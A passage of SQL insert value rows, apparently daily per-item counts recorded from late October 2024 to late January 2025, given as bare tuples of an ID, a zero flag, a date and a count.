(824,0,'20241027',1),
(831,0,'20241027',1),
(840,0,'20241027',1),
(851,0,'20241027',1),
(855,0,'20241027',1),
(859,0,'20241027',1),
(871,0,'20241027',1),
(1003,0,'20241027',1),
(1010,0,'20241027',1),
(1016,0,'20241027',1),
(1020,0,'20241027',1),
(1032,0,'20241027',1),
(1036,0,'20241027',1),
(1052,0,'20241027',1),
(1059,0,'20241027',1),
(14,0,'20241027',8),
(459,0,'20241028',1),
(469,0,'20241028',1),
(650,0,'20241028',1),
(680,0,'20241028',1),
(771,0,'20241028',1),
(784,0,'20241028',1),
(840,0,'20241028',1),
(851,0,'20241028',1),
(1059,0,'20241028',1),
(506,0,'20241028',2),
(14,0,'20241028',4),
(476,0,'20241029',1),
(546,0,'20241029',1),
(566,0,'20241029',1),
(650,0,'20241029',1),
(680,0,'20241029',1),
(703,0,'20241029',1),
(708,0,'20241029',1),
(712,0,'20241029',1),
(771,0,'20241029',1),
(776,0,'20241029',1),
(780,0,'20241029',1),
(824,0,'20241029',1),
(828,0,'20241029',1),
(831,0,'20241029',1),
(836,0,'20241029',1),
(855,0,'20241029',1),
(859,0,'20241029',1),
(900,0,'20241029',1),
(1003,0,'20241029',1),
(1010,0,'20241029',1),
(1016,0,'20241029',1),
(1020,0,'20241029',1),
(1032,0,'20241029',1),
(1036,0,'20241029',1),
(1052,0,'20241029',1),
(14,0,'20241029',4),
(362,0,'20241030',1),
(484,0,'20241030',1),
(542,0,'20241030',1),
(563,0,'20241030',1),
(605,0,'20241030',1),
(609,0,'20241030',1),
(643,0,'20241030',1),
(656,0,'20241030',1),
(700,0,'20241030',1),
(716,0,'20241030',1),
(741,0,'20241030',1),
(748,0,'20241030',1),
(771,0,'20241030',1),
(810,0,'20241030',1),
(828,0,'20241030',1),
(836,0,'20241030',1),
(871,0,'20241030',1),
(900,0,'20241030',1),
(1032,0,'20241030',1),
(459,0,'20241030',2),
(496,0,'20241030',2),
(506,0,'20241030',2),
(546,0,'20241030',2),
(566,0,'20241030',2),
(650,0,'20241030',2),
(680,0,'20241030',2),
(703,0,'20241030',2),
(708,0,'20241030',2),
(712,0,'20241030',2),
(776,0,'20241030',2),
(780,0,'20241030',2),
(784,0,'20241030',2),
(824,0,'20241030',2),
(831,0,'20241030',2),
(840,0,'20241030',2),
(851,0,'20241030',2),
(855,0,'20241030',2),
(859,0,'20241030',2),
(1003,0,'20241030',2),
(1010,0,'20241030',2),
(1016,0,'20241030',2),
(1020,0,'20241030',2),
(1036,0,'20241030',2),
(1052,0,'20241030',2),
(1059,0,'20241030',2),
(469,0,'20241030',3),
(476,0,'20241030',6),
(355,0,'20241030',18),
(14,0,'20241030',140),
(496,0,'20241031',1),
(542,0,'20241031',1),
(563,0,'20241031',1),
(656,0,'20241031',1),
(700,0,'20241031',1),
(716,0,'20241031',1),
(741,0,'20241031',1),
(748,0,'20241031',1),
(810,0,'20241031',1),
(469,0,'20241031',2),
(14,0,'20241031',5),
(14,0,'20241101',1),
(484,0,'20241101',1),
(643,0,'20241101',1),
(771,0,'20241101',1),
(506,0,'20241102',1),
(680,0,'20241102',1),
(776,0,'20241102',1),
(780,0,'20241102',1),
(784,0,'20241102',1),
(14,0,'20241102',2),
(459,0,'20241103',1),
(469,0,'20241103',1),
(484,0,'20241103',1),
(546,0,'20241103',1),
(650,0,'20241103',1),
(703,0,'20241103',1),
(712,0,'20241103',1),
(824,0,'20241103',1),
(831,0,'20241103',1),
(840,0,'20241103',1),
(851,0,'20241103',1),
(1003,0,'20241103',1),
(1010,0,'20241103',1),
(1016,0,'20241103',1),
(1020,0,'20241103',1),
(1036,0,'20241103',1),
(1052,0,'20241103',1),
(14,0,'20241103',2),
(476,0,'20241103',2),
(828,0,'20241103',2),
(855,0,'20241103',2),
(14,0,'20241104',1),
(506,0,'20241104',1),
(546,0,'20241104',1),
(469,0,'20241105',1),
(496,0,'20241105',1),
(542,0,'20241105',1),
(563,0,'20241105',1),
(605,0,'20241105',1),
(609,0,'20241105',1),
(643,0,'20241105',1),
(656,0,'20241105',1),
(700,0,'20241105',1),
(716,0,'20241105',1),
(741,0,'20241105',1),
(748,0,'20241105',1),
(771,0,'20241105',1),
(810,0,'20241105',1),
(14,0,'20241105',9),
(362,0,'20241106',1),
(484,0,'20241106',1),
(506,0,'20241106',1),
(680,0,'20241106',1),
(776,0,'20241106',1),
(780,0,'20241106',1),
(784,0,'20241106',1),
(1052,0,'20241106',1),
(355,0,'20241106',3),
(14,0,'20241106',11),
(362,0,'20241107',1),
(605,0,'20241107',1),
(609,0,'20241107',1),
(643,0,'20241107',1),
(871,0,'20241107',1),
(14,0,'20241107',5),
(355,0,'20241108',1),
(459,0,'20241108',1),
(469,0,'20241108',1),
(476,0,'20241108',1),
(506,0,'20241108',1),
(546,0,'20241108',1),
(566,0,'20241108',1),
(650,0,'20241108',1),
(703,0,'20241108',1),
(708,0,'20241108',1),
(712,0,'20241108',1),
(824,0,'20241108',1),
(831,0,'20241108',1),
(840,0,'20241108',1),
(851,0,'20241108',1),
(855,0,'20241108',1),
(859,0,'20241108',1),
(1003,0,'20241108',1),
(1010,0,'20241108',1),
(1016,0,'20241108',1),
(1020,0,'20241108',1),
(1036,0,'20241108',1),
(1052,0,'20241108',1),
(1059,0,'20241108',1),
(14,0,'20241108',2),
(362,0,'20241109',1),
(476,0,'20241109',1),
(484,0,'20241109',1),
(506,0,'20241109',1),
(643,0,'20241109',1),
(871,0,'20241109',1),
(1010,0,'20241109',1),
(1016,0,'20241109',1),
(1020,0,'20241109',1),
(1036,0,'20241109',1),
(1059,0,'20241109',1),
(14,0,'20241109',5),
(355,0,'20241110',1),
(1003,0,'20241110',1),
(14,0,'20241110',9),
(355,0,'20241111',1),
(771,0,'20241111',1),
(14,0,'20241111',2),
(650,0,'20241112',1),
(700,0,'20241112',1),
(741,0,'20241112',1),
(14,0,'20241112',7),
(14,0,'20241113',1),
(810,0,'20241113',1),
(828,0,'20241113',1),
(836,0,'20241113',1),
(609,0,'20241114',1),
(656,0,'20241114',1),
(703,0,'20241114',1),
(780,0,'20241114',1),
(840,0,'20241114',1),
(851,0,'20241114',1),
(859,0,'20241114',1),
(900,0,'20241114',1),
(643,0,'20241114',2),
(650,0,'20241114',2),
(824,0,'20241114',2),
(14,0,'20241114',6),
(355,0,'20241115',1),
(484,0,'20241115',1),
(14,0,'20241115',9),
(650,0,'20241116',1),
(496,0,'20241116',2),
(14,0,'20241116',11),
(506,0,'20241117',1),
(771,0,'20241117',1),
(14,0,'20241117',6),
(469,0,'20241118',1),
(506,0,'20241118',1),
(546,0,'20241118',1),
(605,0,'20241118',1),
(650,0,'20241118',1),
(362,0,'20241118',2),
(496,0,'20241118',2),
(14,0,'20241118',3),
(506,0,'20241119',1),
(546,0,'20241119',1),
(609,0,'20241119',1),
(712,0,'20241119',1),
(776,0,'20241119',1),
(1032,0,'20241119',1),
(355,0,'20241119',3),
(14,0,'20241119',9),
(484,0,'20241120',1),
(780,0,'20241120',1),
(14,0,'20241120',5),
(355,0,'20241121',1),
(469,0,'20241121',1),
(542,0,'20241121',1),
(563,0,'20241121',1),
(609,0,'20241121',1),
(703,0,'20241121',1),
(716,0,'20241121',1),
(748,0,'20241121',1),
(784,0,'20241121',1),
(14,0,'20241121',2),
(506,0,'20241121',2),
(362,0,'20241122',1),
(469,0,'20241122',1),
(476,0,'20241122',1),
(542,0,'20241122',1),
(546,0,'20241122',1),
(609,0,'20241122',1),
(643,0,'20241122',1),
(650,0,'20241122',1),
(680,0,'20241122',1),
(700,0,'20241122',1),
(703,0,'20241122',1),
(712,0,'20241122',1),
(741,0,'20241122',1),
(784,0,'20241122',1),
(824,0,'20241122',1),
(828,0,'20241122',1),
(831,0,'20241122',1),
(836,0,'20241122',1),
(851,0,'20241122',1),
(855,0,'20241122',1),
(859,0,'20241122',1),
(900,0,'20241122',1),
(1003,0,'20241122',1),
(1010,0,'20241122',1),
(1016,0,'20241122',1),
(1020,0,'20241122',1),
(1032,0,'20241122',1),
(1036,0,'20241122',1),
(1052,0,'20241122',1),
(1059,0,'20241122',1),
(459,0,'20241122',2),
(566,0,'20241122',2),
(605,0,'20241122',2),
(656,0,'20241122',2),
(708,0,'20241122',2),
(771,0,'20241122',2),
(776,0,'20241122',2),
(780,0,'20241122',2),
(840,0,'20241122',2),
(355,0,'20241122',3),
(14,0,'20241122',8),
(643,0,'20241123',1),
(831,0,'20241123',1),
(14,0,'20241123',8),
(506,0,'20241124',1),
(680,0,'20241124',1),
(828,0,'20241124',1),
(859,0,'20241124',1),
(14,0,'20241124',8),
(542,0,'20241125',1),
(656,0,'20241125',1),
(741,0,'20241125',1),
(784,0,'20241125',1),
(828,0,'20241125',1),
(14,0,'20241125',8),
(355,0,'20241126',1),
(362,0,'20241126',1),
(459,0,'20241126',1),
(469,0,'20241126',1),
(496,0,'20241126',1),
(506,0,'20241126',1),
(542,0,'20241126',1),
(563,0,'20241126',1),
(566,0,'20241126',1),
(650,0,'20241126',1),
(700,0,'20241126',1),
(703,0,'20241126',1),
(716,0,'20241126',1),
(748,0,'20241126',1),
(780,0,'20241126',1),
(855,0,'20241126',1),
(1036,0,'20241126',1),
(14,0,'20241126',7),
(355,0,'20241127',1),
(476,0,'20241127',1),
(496,0,'20241127',1),
(542,0,'20241127',1),
(605,0,'20241127',1),
(831,0,'20241127',1),
(840,0,'20241127',1),
(871,0,'20241127',1),
(1003,0,'20241127',1),
(469,0,'20241127',2),
(656,0,'20241127',2),
(14,0,'20241127',12),
(14,0,'20241128',1),
(469,0,'20241128',1),
(650,0,'20241128',1),
(708,0,'20241128',1),
(810,0,'20241128',1),
(900,0,'20241128',1),
(1010,0,'20241128',1),
(506,0,'20241129',1),
(656,0,'20241129',1),
(14,0,'20241129',5),
(355,0,'20241130',1),
(469,0,'20241130',1),
(476,0,'20241130',1),
(484,0,'20241130',1),
(496,0,'20241130',1),
(542,0,'20241130',1),
(650,0,'20241130',1),
(656,0,'20241130',1),
(780,0,'20241130',1),
(831,0,'20241130',1),
(855,0,'20241130',1),
(1003,0,'20241130',1),
(14,0,'20241130',2),
(506,0,'20241201',1),
(840,0,'20241201',1),
(855,0,'20241201',1),
(1016,0,'20241201',1),
(14,0,'20241201',11),
(355,0,'20241202',1),
(496,0,'20241202',1),
(650,0,'20241202',1),
(780,0,'20241202',1),
(831,0,'20241202',1),
(855,0,'20241202',1),
(1036,0,'20241202',1),
(469,0,'20241202',2),
(14,0,'20241202',11),
(476,0,'20241203',1),
(496,0,'20241203',1),
(542,0,'20241203',1),
(650,0,'20241203',1),
(656,0,'20241203',1),
(741,0,'20241203',1),
(831,0,'20241203',1),
(1003,0,'20241203',1),
(1052,0,'20241203',1),
(14,0,'20241203',4),
(506,0,'20241203',4),
(362,0,'20241204',1),
(563,0,'20241204',1),
(650,0,'20241204',1),
(506,0,'20241204',2),
(605,0,'20241204',2),
(14,0,'20241204',4),
(14,0,'20241205',12),
(362,0,'20241206',1),
(476,0,'20241206',1),
(484,0,'20241206',1),
(506,0,'20241206',1),
(1003,0,'20241206',1),
(1010,0,'20241206',1),
(1016,0,'20241206',1),
(1020,0,'20241206',1),
(1036,0,'20241206',1),
(1059,0,'20241206',1),
(355,0,'20241206',2),
(609,0,'20241206',2),
(643,0,'20241206',2),
(871,0,'20241206',2),
(14,0,'20241206',5),
(506,0,'20241207',1),
(650,0,'20241207',1),
(700,0,'20241207',1),
(741,0,'20241207',1),
(355,0,'20241207',2),
(14,0,'20241207',8),
(355,0,'20241208',1),
(362,0,'20241208',1),
(484,0,'20241208',1),
(496,0,'20241208',1),
(542,0,'20241208',1),
(563,0,'20241208',1),
(605,0,'20241208',1),
(609,0,'20241208',1),
(643,0,'20241208',1),
(656,0,'20241208',1),
(716,0,'20241208',1),
(748,0,'20241208',1),
(810,0,'20241208',1),
(828,0,'20241208',1),
(14,0,'20241208',18),
(355,0,'20241209',1),
(506,0,'20241209',1),
(810,0,'20241209',1),
(824,0,'20241209',1),
(836,0,'20241209',1),
(859,0,'20241209',1),
(871,0,'20241209',1),
(900,0,'20241209',1),
(14,0,'20241209',14),
(469,0,'20241210',1),
(476,0,'20241210',1),
(496,0,'20241210',1),
(650,0,'20241210',1),
(656,0,'20241210',1),
(780,0,'20241210',1),
(831,0,'20241210',1),
(851,0,'20241210',1),
(855,0,'20241210',1),
(1003,0,'20241210',1),
(1036,0,'20241210',1),
(355,0,'20241210',2),
(840,0,'20241210',2),
(14,0,'20241210',8),
(469,0,'20241211',1),
(496,0,'20241211',1),
(506,0,'20241211',1),
(605,0,'20241211',1),
(355,0,'20241211',2),
(14,0,'20241211',8),
(362,0,'20241212',1),
(459,0,'20241212',1),
(469,0,'20241212',1),
(476,0,'20241212',1),
(484,0,'20241212',1),
(496,0,'20241212',1),
(506,0,'20241212',1),
(542,0,'20241212',1),
(546,0,'20241212',1),
(563,0,'20241212',1),
(566,0,'20241212',1),
(605,0,'20241212',1),
(609,0,'20241212',1),
(643,0,'20241212',1),
(650,0,'20241212',1),
(700,0,'20241212',1),
(708,0,'20241212',1),
(748,0,'20241212',1),
(771,0,'20241212',1),
(780,0,'20241212',1),
(784,0,'20241212',1),
(824,0,'20241212',1),
(831,0,'20241212',1),
(836,0,'20241212',1),
(851,0,'20241212',1),
(855,0,'20241212',1),
(859,0,'20241212',1),
(871,0,'20241212',1),
(900,0,'20241212',1),
(1010,0,'20241212',1),
(1016,0,'20241212',1),
(1020,0,'20241212',1),
(1032,0,'20241212',1),
(1052,0,'20241212',1),
(1059,0,'20241212',1),
(355,0,'20241212',2),
(741,0,'20241212',2),
(14,0,'20241212',9),
(469,0,'20241213',1),
(506,0,'20241213',1),
(680,0,'20241213',1),
(703,0,'20241213',1),
(716,0,'20241213',1),
(810,0,'20241213',1),
(840,0,'20241213',1),
(1003,0,'20241213',1),
(1036,0,'20241213',1),
(355,0,'20241213',2),
(14,0,'20241213',5),
(656,0,'20241214',1),
(776,0,'20241214',1),
(355,0,'20241214',2),
(712,0,'20241214',2),
(14,0,'20241214',17),
(362,0,'20241215',1),
(828,0,'20241215',1),
(1032,0,'20241215',1),
(14,0,'20241215',5),
(496,0,'20241216',1),
(506,0,'20241216',1),
(605,0,'20241216',1),
(643,0,'20241216',1),
(14,0,'20241216',8),
(355,0,'20241217',1),
(459,0,'20241217',1),
(469,0,'20241217',1),
(506,0,'20241217',1),
(542,0,'20241217',1),
(563,0,'20241217',1),
(566,0,'20241217',1),
(656,0,'20241217',1),
(700,0,'20241217',1),
(703,0,'20241217',1),
(708,0,'20241217',1),
(716,0,'20241217',1),
(741,0,'20241217',1),
(748,0,'20241217',1),
(771,0,'20241217',1),
(776,0,'20241217',1),
(784,0,'20241217',1),
(871,0,'20241217',1),
(14,0,'20241217',9),
(355,0,'20241218',1),
(459,0,'20241218',1),
(771,0,'20241218',1),
(780,0,'20241218',1),
(784,0,'20241218',1),
(840,0,'20241218',1),
(851,0,'20241218',1),
(469,0,'20241218',2),
(506,0,'20241218',2),
(1059,0,'20241218',2),
(14,0,'20241218',6),
(469,0,'20241219',1),
(476,0,'20241219',1),
(546,0,'20241219',1),
(566,0,'20241219',1),
(650,0,'20241219',1),
(680,0,'20241219',1),
(703,0,'20241219',1),
(708,0,'20241219',1),
(712,0,'20241219',1),
(776,0,'20241219',1),
(780,0,'20241219',1),
(824,0,'20241219',1),
(828,0,'20241219',1),
(831,0,'20241219',1),
(836,0,'20241219',1),
(855,0,'20241219',1),
(900,0,'20241219',1),
(1003,0,'20241219',1),
(1010,0,'20241219',1),
(1016,0,'20241219',1),
(1020,0,'20241219',1),
(1032,0,'20241219',1),
(1036,0,'20241219',1),
(1052,0,'20241219',1),
(1059,0,'20241219',1),
(355,0,'20241219',2),
(609,0,'20241219',2),
(859,0,'20241219',2),
(14,0,'20241219',7),
(563,0,'20241220',1),
(643,0,'20241220',1),
(680,0,'20241220',1),
(355,0,'20241220',2),
(14,0,'20241220',6),
(506,0,'20241221',1),
(14,0,'20241221',8),
(496,0,'20241222',1),
(355,0,'20241222',5),
(14,0,'20241222',12),
(871,0,'20241223',1),
(14,0,'20241223',2),
(355,0,'20241224',2),
(14,0,'20241224',5),
(355,0,'20241225',1),
(506,0,'20241225',1),
(546,0,'20241225',1),
(14,0,'20241225',3),
(871,0,'20241226',1),
(1003,0,'20241226',1),
(1010,0,'20241226',1),
(1016,0,'20241226',1),
(355,0,'20241226',3),
(14,0,'20241226',11),
(14,0,'20241227',1),
(546,0,'20241227',1),
(780,0,'20241227',1),
(1032,0,'20241227',1),
(355,0,'20241227',2),
(362,0,'20241227',2),
(459,0,'20241227',2),
(484,0,'20241227',2),
(496,0,'20241227',2),
(566,0,'20241227',2),
(609,0,'20241227',2),
(656,0,'20241227',2),
(680,0,'20241227',2),
(700,0,'20241227',2),
(703,0,'20241227',2),
(708,0,'20241227',2),
(712,0,'20241227',2),
(748,0,'20241227',2),
(771,0,'20241227',2),
(776,0,'20241227',2),
(810,0,'20241227',2),
(824,0,'20241227',2),
(836,0,'20241227',2),
(840,0,'20241227',2),
(851,0,'20241227',2),
(855,0,'20241227',2),
(900,0,'20241227',2),
(1003,0,'20241227',2),
(1010,0,'20241227',2),
(1016,0,'20241227',2),
(1020,0,'20241227',2),
(1036,0,'20241227',2),
(1059,0,'20241227',2),
(476,0,'20241227',3),
(643,0,'20241227',3),
(831,0,'20241227',3),
(828,0,'20241228',1),
(851,0,'20241228',1),
(900,0,'20241228',1),
(506,0,'20241228',2),
(14,0,'20241228',6),
(459,0,'20241229',2),
(476,0,'20241229',2),
(484,0,'20241229',2),
(496,0,'20241229',2),
(506,0,'20241229',2),
(542,0,'20241229',2),
(546,0,'20241229',2),
(563,0,'20241229',2),
(566,0,'20241229',2),
(605,0,'20241229',2),
(609,0,'20241229',2),
(643,0,'20241229',2),
(650,0,'20241229',2),
(656,0,'20241229',2),
(680,0,'20241229',2),
(700,0,'20241229',2),
(703,0,'20241229',2),
(708,0,'20241229',2),
(712,0,'20241229',2),
(716,0,'20241229',2),
(741,0,'20241229',2),
(748,0,'20241229',2),
(771,0,'20241229',2),
(776,0,'20241229',2),
(780,0,'20241229',2),
(784,0,'20241229',2),
(828,0,'20241229',2),
(831,0,'20241229',2),
(851,0,'20241229',2),
(855,0,'20241229',2),
(859,0,'20241229',2),
(871,0,'20241229',2),
(900,0,'20241229',2),
(1003,0,'20241229',2),
(1010,0,'20241229',2),
(1016,0,'20241229',2),
(1020,0,'20241229',2),
(1032,0,'20241229',2),
(1036,0,'20241229',2),
(1059,0,'20241229',2),
(362,0,'20241229',3),
(469,0,'20241229',3),
(810,0,'20241229',3),
(824,0,'20241229',3),
(836,0,'20241229',3),
(840,0,'20241229',3),
(1052,0,'20241229',3),
(355,0,'20241229',19),
(14,0,'20241229',107),
(840,0,'20241230',1),
(851,0,'20241230',1),
(859,0,'20241230',1),
(14,0,'20241230',10),
(484,0,'20241231',1),
(643,0,'20241231',1),
(771,0,'20241231',1),
(1036,0,'20241231',1),
(355,0,'20241231',2),
(362,0,'20241231',2),
(605,0,'20241231',2),
(609,0,'20241231',2),
(14,0,'20241231',5),
(459,0,'20250101',1),
(506,0,'20250101',1),
(546,0,'20250101',1),
(650,0,'20250101',1),
(700,0,'20250101',1),
(712,0,'20250101',1),
(824,0,'20250101',1),
(828,0,'20250101',1),
(855,0,'20250101',1),
(1016,0,'20250101',1),
(1052,0,'20250101',1),
(1059,0,'20250101',1),
(469,0,'20250101',2),
(355,0,'20250101',3),
(14,0,'20250101',9),
(355,0,'20250102',1),
(680,0,'20250102',1),
(780,0,'20250102',1),
(14,0,'20250102',4),
(566,0,'20250103',1),
(784,0,'20250103',1),
(836,0,'20250103',1),
(355,0,'20250103',2),
(14,0,'20250103',5),
(476,0,'20250104',1),
(546,0,'20250104',1),
(708,0,'20250104',1),
(712,0,'20250104',1),
(716,0,'20250104',1),
(776,0,'20250104',1),
(836,0,'20250104',1),
(900,0,'20250104',1),
(1032,0,'20250104',1),
(14,0,'20250104',3),
(484,0,'20250105',1),
(496,0,'20250105',1),
(506,0,'20250105',1),
(542,0,'20250105',1),
(563,0,'20250105',1),
(656,0,'20250105',1),
(700,0,'20250105',1),
(716,0,'20250105',1),
(741,0,'20250105',1),
(748,0,'20250105',1),
(780,0,'20250105',1),
(810,0,'20250105',1),
(1003,0,'20250105',1),
(355,0,'20250105',2),
(871,0,'20250105',5),
(14,0,'20250105',13),
(355,0,'20250106',1),
(506,0,'20250106',1),
(566,0,'20250106',1),
(656,0,'20250106',1),
(700,0,'20250106',1),
(703,0,'20250106',1),
(771,0,'20250106',1),
(1032,0,'20250106',1),
(14,0,'20250106',5),
(459,0,'20250107',1),
(469,0,'20250107',1),
(708,0,'20250107',1),
(741,0,'20250107',1),
(780,0,'20250107',1),
(824,0,'20250107',1),
(828,0,'20250107',1),
(900,0,'20250107',1),
(1059,0,'20250107',1),
(14,0,'20250107',8),
(14,0,'20250108',1),
(355,0,'20250109',1),
(496,0,'20250109',1),
(650,0,'20250109',1),
(703,0,'20250109',1),
(831,0,'20250109',1),
(1020,0,'20250109',1),
(859,0,'20250110',1),
(1036,0,'20250110',1),
(14,0,'20250110',9),
(362,0,'20250111',1),
(459,0,'20250111',1),
(476,0,'20250111',1),
(484,0,'20250111',1),
(496,0,'20250111',1),
(506,0,'20250111',1),
(546,0,'20250111',1),
(566,0,'20250111',1),
(609,0,'20250111',1),
(643,0,'20250111',1),
(656,0,'20250111',1),
(680,0,'20250111',1),
(700,0,'20250111',1),
(703,0,'20250111',1),
(708,0,'20250111',1),
(712,0,'20250111',1),
(771,0,'20250111',1),
(780,0,'20250111',1),
(810,0,'20250111',1),
(824,0,'20250111',1),
(828,0,'20250111',1),
(831,0,'20250111',1),
(836,0,'20250111',1),
(840,0,'20250111',1),
(851,0,'20250111',1),
(855,0,'20250111',1),
(859,0,'20250111',1),
(871,0,'20250111',1),
(900,0,'20250111',1),
(1003,0,'20250111',1),
(1010,0,'20250111',1),
(1016,0,'20250111',1),
(1020,0,'20250111',1),
(1032,0,'20250111',1),
(1036,0,'20250111',1),
(1052,0,'20250111',1),
(1059,0,'20250111',1),
(469,0,'20250111',2),
(542,0,'20250111',2),
(563,0,'20250111',2),
(716,0,'20250111',2),
(741,0,'20250111',2),
(748,0,'20250111',2),
(776,0,'20250111',2),
(784,0,'20250111',2),
(605,0,'20250111',3),
(650,0,'20250111',3),
(355,0,'20250111',17),
(14,0,'20250111',75),
(609,0,'20250112',1),
(643,0,'20250112',1),
(1010,0,'20250112',1),
(14,0,'20250112',11),
(459,0,'20250113',1),
(476,0,'20250113',1),
(484,0,'20250113',1),
(496,0,'20250113',1),
(506,0,'20250113',1),
(542,0,'20250113',1),
(546,0,'20250113',1),
(563,0,'20250113',1),
(566,0,'20250113',1),
(650,0,'20250113',1),
(680,0,'20250113',1),
(700,0,'20250113',1),
(703,0,'20250113',1),
(708,0,'20250113',1),
(712,0,'20250113',1),
(716,0,'20250113',1),
(741,0,'20250113',1),
(748,0,'20250113',1),
(771,0,'20250113',1),
(776,0,'20250113',1),
(780,0,'20250113',1),
(784,0,'20250113',1),
(810,0,'20250113',1),
(824,0,'20250113',1),
(828,0,'20250113',1),
(831,0,'20250113',1),
(836,0,'20250113',1),
(840,0,'20250113',1),
(851,0,'20250113',1),
(855,0,'20250113',1),
(859,0,'20250113',1),
(871,0,'20250113',1),
(900,0,'20250113',1),
(1003,0,'20250113',1),
(1010,0,'20250113',1),
(1016,0,'20250113',1),
(1020,0,'20250113',1),
(1032,0,'20250113',1),
(1036,0,'20250113',1),
(1052,0,'20250113',1),
(1059,0,'20250113',1),
(362,0,'20250113',2),
(469,0,'20250113',2),
(605,0,'20250113',2),
(643,0,'20250113',2),
(656,0,'20250113',2),
(609,0,'20250113',3),
(355,0,'20250113',8),
(14,0,'20250113',27),
(680,0,'20250114',1),
(546,0,'20250114',2),
(14,0,'20250114',5),
(506,0,'20250115',1),
(542,0,'20250115',1),
(563,0,'20250115',1),
(605,0,'20250115',1),
(656,0,'20250115',1),
(716,0,'20250115',1),
(741,0,'20250115',1),
(784,0,'20250115',1),
(828,0,'20250115',1),
(859,0,'20250115',1),
(871,0,'20250115',1),
(1052,0,'20250115',1),
(469,0,'20250115',2),
(650,0,'20250115',2),
(14,0,'20250115',7),
(362,0,'20250116',1),
(469,0,'20250116',1),
(476,0,'20250116',1),
(484,0,'20250116',1),
(563,0,'20250116',1),
(566,0,'20250116',1),
(609,0,'20250116',1),
(656,0,'20250116',1),
(716,0,'20250116',1),
(748,0,'20250116',1),
(776,0,'20250116',1),
(831,0,'20250116',1),
(836,0,'20250116',1),
(871,0,'20250116',1),
(900,0,'20250116',1),
(1003,0,'20250116',1),
(1010,0,'20250116',1),
(1016,0,'20250116',1),
(1032,0,'20250116',1),
(1036,0,'20250116',1),
(496,0,'20250116',2),
(1020,0,'20250116',3),
(355,0,'20250116',4),
(14,0,'20250116',6),
(362,0,'20250117',1),
(1036,0,'20250117',1),
(476,0,'20250117',2),
(484,0,'20250117',2),
(496,0,'20250117',2),
(563,0,'20250117',2),
(566,0,'20250117',2),
(605,0,'20250117',2),
(643,0,'20250117',2),
(656,0,'20250117',2),
(716,0,'20250117',2),
(748,0,'20250117',2),
(771,0,'20250117',2),
(776,0,'20250117',2),
(836,0,'20250117',2),
(859,0,'20250117',2),
(900,0,'20250117',2),
(1010,0,'20250117',2),
(1020,0,'20250117',2),
(1032,0,'20250117',2),
(1052,0,'20250117',2),
(459,0,'20250117',3),
(506,0,'20250117',3),
(542,0,'20250117',3),
(546,0,'20250117',3),
(609,0,'20250117',3),
(680,0,'20250117',3),
(700,0,'20250117',3),
(703,0,'20250117',3),
(708,0,'20250117',3),
(712,0,'20250117',3),
(741,0,'20250117',3),
(780,0,'20250117',3),
(784,0,'20250117',3),
(810,0,'20250117',3),
(824,0,'20250117',3),
(831,0,'20250117',3),
(840,0,'20250117',3),
(851,0,'20250117',3),
(855,0,'20250117',3),
(871,0,'20250117',3),
(1003,0,'20250117',3),
(1016,0,'20250117',3),
(1059,0,'20250117',3),
(469,0,'20250117',4),
(650,0,'20250117',4),
(828,0,'20250117',4),
(355,0,'20250117',19),
(14,0,'20250117',84),
(355,0,'20250118',1),
(506,0,'20250118',1),
(605,0,'20250118',1),
(810,0,'20250118',1),
(1052,0,'20250118',1),
(14,0,'20250118',7),
(355,0,'20250119',1),
(469,0,'20250119',1),
(609,0,'20250119',1),
(643,0,'20250119',1),
(824,0,'20250119',1),
(851,0,'20250119',1),
(859,0,'20250119',1),
(871,0,'20250119',1),
(1059,0,'20250119',1),
(546,0,'20250119',2),
(650,0,'20250119',2),
(14,0,'20250119',9),
(476,0,'20250120',1),
(546,0,'20250120',1),
(566,0,'20250120',1),
(605,0,'20250120',1),
(680,0,'20250120',1),
(703,0,'20250120',1),
(708,0,'20250120',1),
(712,0,'20250120',1),
(776,0,'20250120',1),
(780,0,'20250120',1),
(824,0,'20250120',1),
(828,0,'20250120',1),
(831,0,'20250120',1),
(836,0,'20250120',1),
(859,0,'20250120',1),
(900,0,'20250120',1),
(1003,0,'20250120',1),
(1010,0,'20250120',1),
(1016,0,'20250120',1),
(1020,0,'20250120',1),
(1032,0,'20250120',1),
(1036,0,'20250120',1),
(1052,0,'20250120',1),
(484,0,'20250121',1),
(542,0,'20250121',1),
(605,0,'20250121',1),
(643,0,'20250121',1),
(748,0,'20250121',1),
(810,0,'20250121',1),
(855,0,'20250121',1),
(362,0,'20250121',2),
(609,0,'20250121',2),
(650,0,'20250121',2),
(1036,0,'20250121',2),
(14,0,'20250121',6),
(362,0,'20250122',1),
(496,0,'20250122',1),
(546,0,'20250122',1),
(609,0,'20250122',1),
(605,0,'20250122',2),
(14,0,'20250122',13),
(355,0,'20250123',1),
(496,0,'20250123',1),
(605,0,'20250123',1),
(14,0,'20250123',4),
(506,0,'20250124',1),
(605,0,'20250124',1),
(643,0,'20250124',1),
(712,0,'20250124',1),
(836,0,'20250124',1),
(1032,0,'20250124',1),
(1059,0,'20250124',1),
(900,0,'20250124',2),
(14,0,'20250124',7),
(1020,0,'20250125',1),
(14,0,'20250125',4),
(362,0,'20250126',1),
(459,0,'20250126',1),
(476,0,'20250126',1),
(484,0,'20250126',1),
(496,0,'20250126',1),
(542,0,'20250126',1),
(546,0,'20250126',1),
(563,0,'20250126',1),
(566,0,'20250126',1),
(605,0,'20250126',1),
(609,0,'20250126',1),
(643,0,'20250126',1),
(650,0,'20250126',1),
(656,0,'20250126',1),
(680,0,'20250126',1),
(700,0,'20250126',1),
(708,0,'20250126',1),
(712,0,'20250126',1),
(716,0,'20250126',1),
(741,0,'20250126',1),
(748,0,'20250126',1),
(776,0,'20250126',1),
(780,0,'20250126',1),
(784,0,'20250126',1),
(810,0,'20250126',1),
(824,0,'20250126',1),
(828,0,'20250126',1),
(831,0,'20250126',1),
(836,0,'20250126',1),
(840,0,'20250126',1),
(851,0,'20250126',1),
(855,0,'20250126',1),
(859,0,'20250126',1),
(900,0,'20250126',1),
(1003,0,'20250126',1),
(1010,0,'20250126',1),
(1016,0,'20250126',1),
(1020,0,'20250126',1),
(1032,0,'20250126',1),
(1036,0,'20250126',1),
(1052,0,'20250126',1),
(1059,0,'20250126',1),
(469,0,'20250126',2),
(703,0,'20250126',2),
(771,0,'20250126',2),
(506,0,'20250126',11),
(871,0,'20250126',11),
(355,0,'20250126',17),
(14,0,'20250126',76),
(459,0,'20250127',1),
(506,0,'20250127',1),
(566,0,'20250127',1),
(656,0,'20250127',1),
(700,0,'20250127',1),
(708,0,'20250127',1),
(780,0,'20250127',1),
(355,0,'20250127',2),
(469,0,'20250127',2),
(14,0,'20250127',8),
(546,0,'20250128',1),
